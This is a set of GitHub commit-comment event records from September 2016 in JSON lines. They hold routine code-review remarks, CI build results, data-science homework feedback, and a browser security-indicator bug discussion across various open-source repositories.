{"id":"4560046396","type":"CommitCommentEvent","actor":{"login":"evanmhm"},"repo":{"name":"FRCTools/Attendance-Client"},"payload":{"comment":{"id":19013205,"position":5,"line":22,"path":"app/assets/js/main.js","commit_id":"dd8e0e7a6cbb84f613d93065244552d9d0161eaf","created_at":"2016-09-14T06:14:39Z","updated_at":"2016-09-14T06:14:39Z","body":"Good idea 👍🏻"}},"created_at":"2016-09-14T06:14:39Z"}
{"id":"4560046547","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19013206,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-14T06:14:41Z","updated_at":"2016-09-14T06:14:41Z","body":"empd_bugfix (nmerket) - Win64-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T06:14:41Z"}
{"id":"4560056440","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19013218,"position":16,"line":858,"path":"js/components/frame.js","commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-14T06:17:53Z","updated_at":"2016-09-14T06:17:53Z","body":"that could definitely be causing problems. reloading the entire page isn't ideal but it was the easiest way to update all the location-related UI (urlbar input value, the domain in titlemode, security state, etc.). FWIW this only needs to be called on provisional load failure AFAICT"}},"created_at":"2016-09-14T06:17:53Z"}
{"id":"4560056591","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"nganmbui/sfdat26_work"},"payload":{"comment":{"id":19013219,"position":null,"line":null,"path":null,"commit_id":"7f0e1a8557b8e2730cd3ba91abb17f1bc3e02b79","created_at":"2016-09-14T06:17:57Z","updated_at":"2016-09-14T06:17:57Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- For pd.merge, in order to preserve all the data, a left join first between inspections & violations (how='left', on=['business_id','date']) would have worked better than the default inner join.\r\n- Your inspection counts (#2, #3) are a bit off because of the join. In the future, consider qa'ing against the original dataset (in this case, inspections) so you can catch issues with your combined dataframe before you proceed with analysis.\r\n- #4 - Nice job using strptime and grouper. Alternatively, in your data loads, you can also use parse_dates=['date'] in order to parse that column into a date.\r\n- #7 - For this question, assuming a violation_id was created, you could do: restaurant_scores[restaurant_scores.type == 'New Ownership'].groupby('risk_category').violation_id.nunique()\r\n- #10 Extra credit - I think for this to run, in your request object you just need the ampersand in front of lat '&lat='\r\n\r\n**A Little More Morbid**\r\n- #11 - to make this more readable and interpretable, consider adding parameters such as (figsize = (12,8), sharex = True, sharey = True)\r\n\r\n**Less Morbid**\r\n- #4 - In order to get label x-axis, you can do something like:\r\ntop10 = majors[['Major','Median']].sort_values(by='Median', ascending=False).head(10)\r\ntop10.plot(kind='bar', x='Major')\r\n- #8 - Preferred way: majors['Median'].hist(by=majors['Major_category'], sharex = True, sharey = True, figsize=(15,10))\r\n- #9 - Consider subsetting data to what you need: majors[['Major','Unemployment_rate']] and then doing sorting on top of that. This way, there aren't extraneous columns not needed to answer the question.\r\n\r\nNice work Ngan!"}},"created_at":"2016-09-14T06:17:57Z"}
{"id":"4560057986","type":"CommitCommentEvent","actor":{"login":"seanastephens"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013224,"position":2,"line":12,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T06:18:25Z","updated_at":"2016-09-14T06:18:25Z","body":"This can be `None` too, I noticed while testing. Do we care?"}},"created_at":"2016-09-14T06:18:25Z"}
{"id":"4560059076","type":"CommitCommentEvent","actor":{"login":"dneise"},"repo":{"name":"fact-project/shifthelper_webinterface"},"payload":{"comment":{"id":19013226,"position":39,"line":56,"path":"shifthelper_webinterface/__init__.py","commit_id":"1c37722d15c5c33f866e1aef5ce9185edde417b0","created_at":"2016-09-14T06:18:47Z","updated_at":"2016-09-14T06:18:47Z","body":"I think, this shouldn't except all Exceptions, just the one you expect, which is a ValueError from the int(), I think"}},"created_at":"2016-09-14T06:18:47Z"}
{"id":"4560059343","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"laohyx/electsys"},"payload":{"comment":{"id":19013227,"position":null,"line":null,"path":null,"commit_id":"e9760c94b2564efc7c1876d2b81d7a7b77a4fdbd","created_at":"2016-09-14T06:18:53Z","updated_at":"2016-09-14T06:18:53Z","body":"是他是他就是他，勤劳勇敢的小豆蛙(就蛙最押韵.....)"}},"created_at":"2016-09-14T06:18:53Z"}
{"id":"4560062702","type":"CommitCommentEvent","actor":{"login":"martingtz"},"repo":{"name":"david9106/IS-Repo-Equipo2"},"payload":{"comment":{"id":19013234,"position":null,"line":null,"path":null,"commit_id":"50c23fc79a93c56f29e038876013a794cf5f7960","created_at":"2016-09-14T06:19:58Z","updated_at":"2016-09-14T06:19:58Z","body":"Hola mundo"}},"created_at":"2016-09-14T06:19:58Z"}
{"id":"4560066128","type":"CommitCommentEvent","actor":{"login":"seanastephens"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013239,"position":12,"line":20,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T06:21:06Z","updated_at":"2016-09-14T06:21:06Z","body":"I don't think this condition is ever `true` now."}},"created_at":"2016-09-14T06:21:06Z"}
{"id":"4560067879","type":"CommitCommentEvent","actor":{"login":"basicer"},"repo":{"name":"codecombat/codecombat"},"payload":{"comment":{"id":19013245,"position":46,"line":108,"path":"server/middleware/auth.coffee","commit_id":"8359c9548934d669793db100fa32d22092260114","created_at":"2016-09-14T06:21:39Z","updated_at":"2016-09-14T06:21:39Z","body":"@basicer Note to future Rob: We need to make sure `auth.client_id == config.clever.client_id`"}},"created_at":"2016-09-14T06:21:39Z"}
{"id":"4560069718","type":"CommitCommentEvent","actor":{"login":"simisiwang"},"repo":{"name":"simisiwang/abc"},"payload":{"comment":{"id":19013249,"position":null,"line":null,"path":null,"commit_id":"fc76ebb9dbecaade531df7c19202d2b6c5767efd","created_at":"2016-09-14T06:22:16Z","updated_at":"2016-09-14T06:22:16Z","body":"aaaaaaaa"}},"created_at":"2016-09-14T06:22:16Z"}
{"id":"4560074700","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013258,"position":7,"line":1269,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T06:23:51Z","updated_at":"2016-09-14T06:23:51Z","body":"UNIT_STAT_CAN_NOT_REACT is suposed to be dynamic. I mean it can change during any event.\r\nSo if you UNIT_STAT_CAN_NOT_REACT is set (eg. is stunned) and a player that is not in threat list do any negative effect to that creature he will not be added as attacker."}},"created_at":"2016-09-14T06:23:51Z"}
{"id":"4560077067","type":"CommitCommentEvent","actor":{"login":"chusiang"},"repo":{"name":"zabbix/zabbix-docker"},"payload":{"comment":{"id":19013265,"position":null,"line":null,"path":null,"commit_id":"5898c48cadf44b7815ea26029b44898b29da73b0","created_at":"2016-09-14T06:24:38Z","updated_at":"2016-09-14T06:24:38Z","body":"I think this commit is fixed #28, thank you."}},"created_at":"2016-09-14T06:24:38Z"}
{"id":"4560078415","type":"CommitCommentEvent","actor":{"login":"lpasquale"},"repo":{"name":"lpasquale/minorityReport"},"payload":{"comment":{"id":19013266,"position":null,"line":null,"path":null,"commit_id":"fbb50e9af874ea5d2340811468d0b61c4789db82","created_at":"2016-09-14T06:25:02Z","updated_at":"2016-09-14T06:25:02Z","body":"Complex Event Definition Compression"}},"created_at":"2016-09-14T06:25:02Z"}
{"id":"4560078840","type":"CommitCommentEvent","actor":{"login":"jmrd98"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":19013268,"position":19,"line":19,"path":"Gamedata/Bluedog_DB/Compatibility/Rescale/64K/Saturn.cfg","commit_id":"ce6e9ff87d983c93117470b5173aaf3e50c4efa4","created_at":"2016-09-14T06:25:10Z","updated_at":"2016-09-14T06:25:10Z","body":"How will this interact with the cyrotanks aspect? I need to think on this one a bit, i'm not certain I understand it, but i'm also off to sleep presently ..."}},"created_at":"2016-09-14T06:25:10Z"}
{"id":"4560080917","type":"CommitCommentEvent","actor":{"login":"seanastephens"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013271,"position":9,"line":17,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T06:25:46Z","updated_at":"2016-09-14T06:25:46Z","body":"We can remove this since we added the `< 7` constraint."}},"created_at":"2016-09-14T06:25:46Z"}
{"id":"4560083647","type":"CommitCommentEvent","actor":{"login":"slandelle"},"repo":{"name":"schmitch/netty"},"payload":{"comment":{"id":19013281,"position":60,"line":242,"path":"codec-http/src/main/java/io/netty/handler/codec/http/QueryStringDecoder.java","commit_id":"6e8c94a8f6665cbb34e2426418163dde6459274d","created_at":"2016-09-14T06:26:40Z","updated_at":"2016-09-14T06:26:40Z","body":"no need for the extra parenthesis"}},"created_at":"2016-09-14T06:26:40Z"}
{"id":"4560085765","type":"CommitCommentEvent","actor":{"login":"luacs1998"},"repo":{"name":"ForgeEssentials/ForgeEssentials"},"payload":{"comment":{"id":19013286,"position":14,"line":69,"path":"build.gradle","commit_id":"317a64204036f9b66b57d0125399628620f5d707","created_at":"2016-09-14T06:27:19Z","updated_at":"2016-09-14T06:27:19Z","body":"Because 1558 is a recommended build?"}},"created_at":"2016-09-14T06:27:19Z"}
{"id":"4560086293","type":"CommitCommentEvent","actor":{"login":"krdav"},"repo":{"name":"psathyrella/partis"},"payload":{"comment":{"id":19013288,"position":null,"line":null,"path":null,"commit_id":"4a83cb8c9023da3a2fe30ee65610c593aa18e627","created_at":"2016-09-14T06:27:29Z","updated_at":"2016-09-14T06:27:29Z","body":"Uhhh, how is the speed now compared to, say 6 month ago? Also are there any change on the memory consumption? Maybe I should try it again again instead of USEARCH."}},"created_at":"2016-09-14T06:27:29Z"}
{"id":"4560086924","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"hj4520/sfdat26-xue"},"payload":{"comment":{"id":19013290,"position":null,"line":null,"path":null,"commit_id":"40c591d1f3d288203775dddb252ed0752da9bfbb","created_at":"2016-09-14T06:27:42Z","updated_at":"2016-09-14T06:27:42Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- #4 - Nice, creative use of strptime, sns, and agg function. Alternatively, to parse date, in your data loads, you can also use parse_dates=['date'].\r\n- #9 - Consider to calculate null accuracy rate to see how your models performs against it.\r\n\r\n**A Little More Morbid**\r\n- #3 - Alternatively, you can do something like:\r\nkillings['streetaddress'].fillna('Unknown', inplace=True)\r\n- #11 - Consider adding figsize to make more readable\r\n\r\n**Less Morbid**\r\n- #3 - groupby('Major'), while works, isn't necessary since Major is already unique in dataset\r\n- #8 - Similarly, I recommend to add figsize = (15,10), for example, to make larger\r\n\r\nNice work Cindy!"}},"created_at":"2016-09-14T06:27:42Z"}
{"id":"4560087432","type":"CommitCommentEvent","actor":{"login":"slandelle"},"repo":{"name":"schmitch/netty"},"payload":{"comment":{"id":19013292,"position":18,"line":112,"path":"codec-http/src/main/java/io/netty/handler/codec/http/QueryStringDecoder.java","commit_id":"6e8c94a8f6665cbb34e2426418163dde6459274d","created_at":"2016-09-14T06:27:52Z","updated_at":"2016-09-14T06:27:52Z","body":"missing parameters' javadoc."}},"created_at":"2016-09-14T06:27:52Z"}
{"id":"4560088231","type":"CommitCommentEvent","actor":{"login":"MaxNoe"},"repo":{"name":"fact-project/shifthelper_webinterface"},"payload":{"comment":{"id":19013293,"position":39,"line":56,"path":"shifthelper_webinterface/__init__.py","commit_id":"1c37722d15c5c33f866e1aef5ce9185edde417b0","created_at":"2016-09-14T06:28:09Z","updated_at":"2016-09-14T06:28:09Z","body":"Good catch, sir"}},"created_at":"2016-09-14T06:28:09Z"}
{"id":"4560089364","type":"CommitCommentEvent","actor":{"login":"LathaPaidi"},"repo":{"name":"LathaPaidi/SampleRepository"},"payload":{"comment":{"id":19013301,"position":null,"line":null,"path":null,"commit_id":"29ce1b3724f6f59da671b4ec3296f813e9ca96bb","created_at":"2016-09-14T06:28:30Z","updated_at":"2016-09-14T06:28:30Z","body":"fddf"}},"created_at":"2016-09-14T06:28:30Z"}
{"id":"4560090211","type":"CommitCommentEvent","actor":{"login":"LathaPaidi"},"repo":{"name":"LathaPaidi/SampleRepository"},"payload":{"comment":{"id":19013305,"position":5,"line":27,"path":"CalculatorApp/CalculatorLib/Calculator.cs","commit_id":"29ce1b3724f6f59da671b4ec3296f813e9ca96bb","created_at":"2016-09-14T06:28:47Z","updated_at":"2016-09-14T06:28:47Z","body":"tefe"}},"created_at":"2016-09-14T06:28:47Z"}
{"id":"4560092003","type":"CommitCommentEvent","actor":{"login":"LathaPaidi"},"repo":{"name":"LathaPaidi/SampleRepository"},"payload":{"comment":{"id":19013310,"position":5,"line":27,"path":"CalculatorApp/CalculatorLib/Calculator.cs","commit_id":"29ce1b3724f6f59da671b4ec3296f813e9ca96bb","created_at":"2016-09-14T06:29:23Z","updated_at":"2016-09-14T06:29:23Z","body":"test"}},"created_at":"2016-09-14T06:29:23Z"}
{"id":"4560093173","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19013314,"position":29,"line":855,"path":"js/components/frame.js","commit_id":"d348ff9df08b6d50a18cab27ca5bb204d6230906","created_at":"2016-09-14T06:29:44Z","updated_at":"2016-09-14T06:29:44Z","body":"this doesn't change the security state of the page to that of the old URL. ex: go to https://bing.com, load http://bayden.com/test/redir/goscript.aspx, the URL bar shows https://bing.com but with an unlocked icon. otherwise lgtm. "}},"created_at":"2016-09-14T06:29:44Z"}
{"id":"4560093199","type":"CommitCommentEvent","actor":{"login":"LathaPaidi"},"repo":{"name":"LathaPaidi/SampleRepository"},"payload":{"comment":{"id":19013315,"position":7,"line":29,"path":"CalculatorApp/CalculatorLib/Calculator.cs","commit_id":"29ce1b3724f6f59da671b4ec3296f813e9ca96bb","created_at":"2016-09-14T06:29:44Z","updated_at":"2016-09-14T06:29:44Z","body":"fdf"}},"created_at":"2016-09-14T06:29:44Z"}
{"id":"4560095382","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013322,"position":6,"line":41,"path":"src/game/AI/GuardianAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T06:30:22Z","updated_at":"2016-09-14T06:30:22Z","body":"A pet should always follow its owner. It can however be momentaly incapacited but that is handled in motionmaster."}},"created_at":"2016-09-14T06:30:22Z"}
{"id":"4560098300","type":"CommitCommentEvent","actor":{"login":"agsdot"},"repo":{"name":"rongyi/dot-files"},"payload":{"comment":{"id":19013327,"position":7,"line":7,"path":"git/gitconfig","commit_id":"93743107a3ee2f6a8b878b4256a384d1b585994e","created_at":"2016-09-14T06:31:15Z","updated_at":"2016-09-14T06:31:15Z","body":"ediotr = vim > editor = editor \r\n\r\ntypo"}},"created_at":"2016-09-14T06:31:15Z"}
{"id":"4560099287","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19013329,"position":29,"line":855,"path":"js/components/frame.js","commit_id":"d348ff9df08b6d50a18cab27ca5bb204d6230906","created_at":"2016-09-14T06:31:33Z","updated_at":"2016-09-14T06:31:33Z","body":"hmmm... not sure what the best way to fix that is. Maybe we're clearing the security state too early? The other method worked because it set the url, but that also caused an infinite loop of reloads for some pages"}},"created_at":"2016-09-14T06:31:33Z"}
{"id":"4560099828","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19013331,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-14T06:31:43Z","updated_at":"2016-09-14T06:31:43Z","body":"Does the latest commit here fix it?\r\n\r\nhttps://github.com/m-kuhn/QGIS/tree/qgsoptionalexpressionexport"}},"created_at":"2016-09-14T06:31:43Z"}
{"id":"4560100493","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19013335,"position":null,"line":null,"path":null,"commit_id":"48e48ad8b64f477592302900a6eefec2d132c90e","created_at":"2016-09-14T06:31:56Z","updated_at":"2016-09-14T06:31:56Z","body":"This not is 100% fixed, because not show the **%** in the weapons with: critical hit chance, critical damage chance, mana leech chance, mana amount chance, etc...\r\n\r\nMust be like this:\r\n\r\n[http://imgur.com/a/OduiH](url)\r\n\r\nBut, is a great work, thanks alot!"}},"created_at":"2016-09-14T06:31:56Z"}
{"id":"4560102833","type":"CommitCommentEvent","actor":{"login":"zigbert"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19013340,"position":null,"line":null,"path":null,"commit_id":"5812a2d525cf60523077bbf09245371db50c6ea1","created_at":"2016-09-14T06:32:42Z","updated_at":"2016-09-14T06:32:42Z","body":"add scalegrip"}},"created_at":"2016-09-14T06:32:42Z"}
{"id":"4560104942","type":"CommitCommentEvent","actor":{"login":"skygong"},"repo":{"name":"clintar/node-cryptonote-pool"},"payload":{"comment":{"id":19013342,"position":null,"line":null,"path":null,"commit_id":"41d65dfbb204d60f1f69e5794205e7f520c0b6d5","created_at":"2016-09-14T06:33:23Z","updated_at":"2016-09-14T06:33:23Z","body":"2016-09-14 02:29:30 pool New block to mine at height 607499 w/ difficulty of 56580998793\r\n2016-09-14 02:29:30 pool Started server listening on port 7777\r\n2016-09-14 02:29:39 Job Refresher Failed to get scratchpad: Error: socket hang up\r\n2016-09-14 02:29:45 Job Refresher Failed to get scratchpad: SyntaxError: Unexpected end of input\r\nfunction getFullScratchpad2(callback)    make a fatal mistake\r\n"}},"created_at":"2016-09-14T06:33:23Z"}
{"id":"4560107385","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013346,"position":14,"line":48,"path":"src/game/AI/GuardianAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T06:34:07Z","updated_at":"2016-09-14T06:34:07Z","body":"I assume if you use this MINI_PET check here its because you already faced that case.\r\nI wander if its good. A mini pet is not a guardian and should not get this AI. Instead there is nullAI for it."}},"created_at":"2016-09-14T06:34:07Z"}
{"id":"4560110754","type":"CommitCommentEvent","actor":{"login":"mundre"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":19013352,"position":null,"line":null,"path":null,"commit_id":"1d424934d97c8c772978837c0eebb292cbc7f808","created_at":"2016-09-14T06:35:08Z","updated_at":"2016-09-14T06:35:08Z","body":"@yvasilyev92 , How have you defined your activity_main.xml ? Just these lines will throw up error:\r\n```\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\nxmlns:tools=\"http://schemas.android.com/tools\"\r\nandroid:layout_width=\"match_parent\"\r\nandroid:layout_height=\"match_parent\"\r\ntools:context=\"com.example.android.sunshine.app.MainActivity\"\r\nandroid:id=\"@+id/container\">\r\n```\r\n\r\n"}},"created_at":"2016-09-14T06:35:08Z"}
{"id":"4560113022","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19013356,"position":29,"line":855,"path":"js/components/frame.js","commit_id":"d348ff9df08b6d50a18cab27ca5bb204d6230906","created_at":"2016-09-14T06:35:47Z","updated_at":"2016-09-14T06:35:47Z","body":"opened https://github.com/brave/browser-laptop/issues/3988 for now"}},"created_at":"2016-09-14T06:35:47Z"}
{"id":"4560113303","type":"CommitCommentEvent","actor":{"login":"0x4d52"},"repo":{"name":"0x4d52/valijson"},"payload":{"comment":{"id":19013358,"position":null,"line":null,"path":null,"commit_id":"2e9d147c9905347cf3ae8ddeea337674905001ee","created_at":"2016-09-14T06:35:52Z","updated_at":"2016-09-14T06:35:52Z","body":"I was going to do this today, just sent the PR. Thanks for this library, I was seeing if it was possible to write an adapter to use with the JUCE library, although it needs some additional iterator support to iterate JSON objects --- see the code [here](https://forum.juce.com/t/feature-request-standard-iterator-support-for-namedvalueset/19078)"}},"created_at":"2016-09-14T06:35:52Z"}
{"id":"4560116525","type":"CommitCommentEvent","actor":{"login":"gadresushrut"},"repo":{"name":"jcwest/deck"},"payload":{"comment":{"id":19013367,"position":null,"line":null,"path":null,"commit_id":"89b312f28097a423dfabf6285ef4fc411c427ce3","created_at":"2016-09-14T06:36:50Z","updated_at":"2016-09-14T06:36:50Z","body":"Changes looks good."}},"created_at":"2016-09-14T06:36:50Z"}
{"id":"4560118453","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19013370,"position":null,"line":null,"path":null,"commit_id":"8eb79bdc5be1117bfd81b6d5f9891f309c784f72","created_at":"2016-09-14T06:37:24Z","updated_at":"2016-09-14T06:37:24Z","body":"Related to: backdrop/backdrop-issues#1503 "}},"created_at":"2016-09-14T06:37:24Z"}
{"id":"4560126514","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":19013376,"position":19,"line":19,"path":"Gamedata/Bluedog_DB/Compatibility/Rescale/64K/Saturn.cfg","commit_id":"ce6e9ff87d983c93117470b5173aaf3e50c4efa4","created_at":"2016-09-14T06:39:59Z","updated_at":"2016-09-14T06:39:59Z","body":"This happens in the Bluedog_DB pass, before cryofuels. All it does is normalize the mass of the engine mounts to be the same as tanks of equivalent capacity. Since we have DV to spare and then some in stock, engine mounts are a good place to stuff additional mass (call it \"structural mass\") to nerf things a bit. We don't want that in 64K."}},"created_at":"2016-09-14T06:39:59Z"}
{"id":"4560130992","type":"CommitCommentEvent","actor":{"login":"raj454raj"},"repo":{"name":"stopstalk/stopstalk-deployment"},"payload":{"comment":{"id":19013380,"position":36,"line":60,"path":"modules/sites/init.py","commit_id":"9a3cc759635e9cc5b747de5ce424ea6102fe722d","created_at":"2016-09-14T06:41:22Z","updated_at":"2016-09-14T06:41:22Z","body":"God! Why was this outside! Unnecessary `MAX_TRIES_ALLOWED` number of requests even on 404s :cry: "}},"created_at":"2016-09-14T06:41:22Z"}
{"id":"4560131022","type":"CommitCommentEvent","actor":{"login":"oakfang"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19013381,"position":null,"line":null,"path":null,"commit_id":"0ca3386a59146316b12eeda19895ef6b0d81666f","created_at":"2016-09-14T06:41:23Z","updated_at":"2016-09-14T06:41:23Z","body":"Hey, I'm pretty sure this bugs out on chrome. Try viewing the \"Quickstart\" page and scrolling down."}},"created_at":"2016-09-14T06:41:23Z"}
{"id":"4560134383","type":"CommitCommentEvent","actor":{"login":"wiewioraseb"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19013387,"position":null,"line":null,"path":null,"commit_id":"94e95a2bcb157657ce09e241386a0f526059ee0c","created_at":"2016-09-14T06:42:27Z","updated_at":"2016-09-14T06:42:27Z","body":"Thank you for your help. Removing node_modules and cleaning cache didn't fix my issue. After npm install i still had version 1.0.1. \r\nTo solve the problem I had to do specifically:\r\nnpm update @angularclass/hmr\r\nnpm update @angularclass/hmr-loader"}},"created_at":"2016-09-14T06:42:27Z"}
{"id":"4560138168","type":"CommitCommentEvent","actor":{"login":"asahi-nakama"},"repo":{"name":"sotukenspeRepository/test"},"payload":{"comment":{"id":19013392,"position":null,"line":null,"path":null,"commit_id":"e33df4e06128019116f86c4977d6df78c22f1a05","created_at":"2016-09-14T06:43:37Z","updated_at":"2016-09-14T06:43:37Z","body":"+# test\r\n +<html>\r\n +<head>\r\n +</head>\r\n +<body>\r\n +<p>aaaaaaaaaaaa</p>\r\n<p>kaijfioajeioajfoiwejfiowea</p>\r\n +</body>\r\n +</html>"}},"created_at":"2016-09-14T06:43:37Z"}
{"id":"4560141370","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"doctrine/doctrine2"},"payload":{"comment":{"id":19013396,"position":null,"line":null,"path":null,"commit_id":"1610d916a4137214385e21e9bc8dcc163feecf06","created_at":"2016-09-14T06:44:36Z","updated_at":"2016-09-14T06:44:36Z","body":":+1: "}},"created_at":"2016-09-14T06:44:36Z"}
{"id":"4560148605","type":"CommitCommentEvent","actor":{"login":"echoma"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19013412,"position":null,"line":null,"path":null,"commit_id":"8a1fa8c114b08683765e025c8e1826f2a16789a6","created_at":"2016-09-14T06:46:46Z","updated_at":"2016-09-14T06:46:46Z","body":"是因为我干掉了这句吧：'你也可以用其它的技术来实现这个。'。这句我当时应该在群里咨询下大家的。这句我翻译完了实在不知道表达的啥意思，就干掉了，后面我注意下。"}},"created_at":"2016-09-14T06:46:46Z"}
{"id":"4560150105","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"cgbeas/DSI-SF-2-cgbeas"},"payload":{"comment":{"id":19013414,"position":null,"line":null,"path":null,"commit_id":"87c29282fdc212ee9886d8b96add4a6a78c0043d","created_at":"2016-09-14T06:47:15Z","updated_at":"2016-09-14T06:47:15Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- For pd.merge, in order to preserve all the data, a left join between inspections & violations (how='left', on=['business_id','date']) would have worked better than the default inner join. Also, since the indexes (business_id) are same, you don't need left_on and right_on, but rather 'on' would work itself.\r\n- #2 - More simply, you could do: inspections.business_id.value_counts().head(10)\r\n- #4 - Nice creative use of functions to extra dates. Alternatively, you can also use parse_dates=['date'] in order to parse that column into a date.\r\n- I like the big, colorful sns chart. For heatmap, you can do:\r\nimport numpy as np\r\nimport seaborn as sns\r\nheat=inspections.groupby('month').business_id.agg({'count':np.size})\r\nsns.heatmap(heat)\r\n- #5 - A quicker way to do this could be: restaurant_scores.loc[restaurant_scores.risk_category=='High Risk'].postal_code.value_counts().head(1)\r\n# 6 - You're on the right track, with lots of good stuff going on. A shorter way to address this question:\r\nrestaurant_scores[restaurant_scores.type=='New Ownership'].groupby(['type','risk_category']).business_id.count()\r\n#8 - I like that you try a lot of different ways and get to a solution. Another way: restaurant_scores.Score.hist(bins=10)\r\n\r\n**A Little More Morbid**\r\n- #11 - Nice job using sns. With matplotlib, you can do: killings.age.hist(by=killings.race, figsize = (12,8), sharex = True, sharey = True)\r\n\r\n**Less Morbid**\r\n- #1 - You can do this in 1 line of code too: majors.drop(['Unnamed: 0','Employed_full_time_year_round', 'Major_code'], axis = 1, inplace=True)\r\n- #3 - you don't need to group by since 'major' is already unique in the dataset.\r\n- #4 - plt.setp(labels,rotation=90) to get all x-axis labels to show\r\n\r\nNice work, Carlos! I think you had the best charts out of everyone! Oftentimes, I observed you got the right answer, but that there are quicker ways / less code needed to accomplish answering the questions."}},"created_at":"2016-09-14T06:47:15Z"}
{"id":"4560151571","type":"CommitCommentEvent","actor":{"login":"lwgordonimos"},"repo":{"name":"aodn/chef"},"payload":{"comment":{"id":19013419,"position":60,"line":67,"path":"cookbooks/imos_webapps/definitions/geonetwork.rb","commit_id":"7fdd4d5b51587de05d20d74ba2a4a613032830cb","created_at":"2016-09-14T06:47:40Z","updated_at":"2016-09-14T06:47:40Z","body":"As discussed, maybe move this outside the \"only run when just deployed\" ruby block so it can run independently"}},"created_at":"2016-09-14T06:47:40Z"}
{"id":"4560157470","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"grails/grails-views"},"payload":{"comment":{"id":19013427,"position":9,"line":9,"path":"json/src/main/groovy/grails/plugin/json/view/api/internal/JsonApiIdGenerator.groovy","commit_id":"a7ba08430da25ccc5e3a17bec1370221853612bd","created_at":"2016-09-14T06:49:26Z","updated_at":"2016-09-14T06:49:26Z","body":"need more grooydocs explaining the class and the methods"}},"created_at":"2016-09-14T06:49:26Z"}
{"id":"4560158240","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"grails/grails-views"},"payload":{"comment":{"id":19013430,"position":7,"line":7,"path":"json/src/main/groovy/grails/plugin/json/view/api/json/DefaultJsonApiIdGenerator.groovy","commit_id":"a7ba08430da25ccc5e3a17bec1370221853612bd","created_at":"2016-09-14T06:49:41Z","updated_at":"2016-09-14T06:49:41Z","body":"groovydocs please"}},"created_at":"2016-09-14T06:49:41Z"}
